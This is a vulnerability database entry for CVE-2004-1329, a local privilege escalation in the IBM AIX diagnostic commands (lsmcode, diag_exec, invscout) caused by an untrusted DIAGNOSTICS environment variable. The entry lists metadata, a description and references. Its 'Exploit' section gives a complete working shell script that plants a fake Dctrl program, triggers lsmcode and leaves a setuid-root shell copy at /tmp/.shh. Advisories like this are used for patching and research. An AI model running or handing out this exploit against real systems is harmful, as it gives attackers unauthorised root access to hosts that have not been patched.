IBM AIX Diag Local Privilege Escalation Vulnerability

Vulnerability ID: 1108379
Vulnerability type: Access validation error
Published: 2004-12-20
Updated: 2005-10-20
CVE ID: CVE-2004-1329
CNNVD-ID: CNNVD-200412-077
Platform: AIX
CVSS score: 7.2
|Vulnerability source
https://www.exploit-db.com/exploits/25039
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-077
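|Vulnerability details
The diagnostic commands in AIX 5.1 through 5.3 contain an untrusted execution path vulnerability. The affected commands include (1) lsmcode, (2) diag_exec, (3) invscout, and (4) invscoutd. A local user can execute arbitrary files by modifying the DIAGNOSTICS environment variable to point to a malicious Dctrl program.
|Exploit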
source: http://www.securityfocus.com/bid/12041/info

diag is reported prone to a local privilege escalation vulnerability. This issue is due to a failure of certain diag applications to properly implement security controls when executing an application specified by the 'DIAGNOSTICS' environment variable.

A local attacker may leverage this issue to gain superuser privileges on a computer running the affected software. 

mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh
|References

Source: XF
Name: aix-diagnostics-gain-privileges(18620)
Link: http://xforce.iss.net/xforce/xfdb/18620
Source: BID
Name: 12041
Link: http://www.securityfocus.com/bid/12041
Source: AIXAPAR
Name: IY64389
Link: http://www-1.ibm.com/support/search.wss?rs=0&q=IY64389&apar=only
Source: AIXAPAR
Name: IY64277
Link: http://www-1.ibm.com/support/search.wss?rs=0&q=IY64277&apar=only
Source: BUGTRAQ
Name: 20041220 AIX 5.1/5.2/5.3 local root exploits
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110355931920123&w=2
Source: BUGTRAQ
Name: 20070402 Re: AIX 4.3 lsmcode local root command execution
Link: http://www.securityfocus.com/archive/1/archive/1/464481/100/0/threaded
Source: BUGTRAQ
Name: 20070330 AIX 4.3 lsmcode local root command execution
Link: http://www.securityfocus.com/archive/1/archive/1/464276/100/0/threaded
Source: MILW0RM
Name: 701
Link: http://milw0rm.com/exploits/701
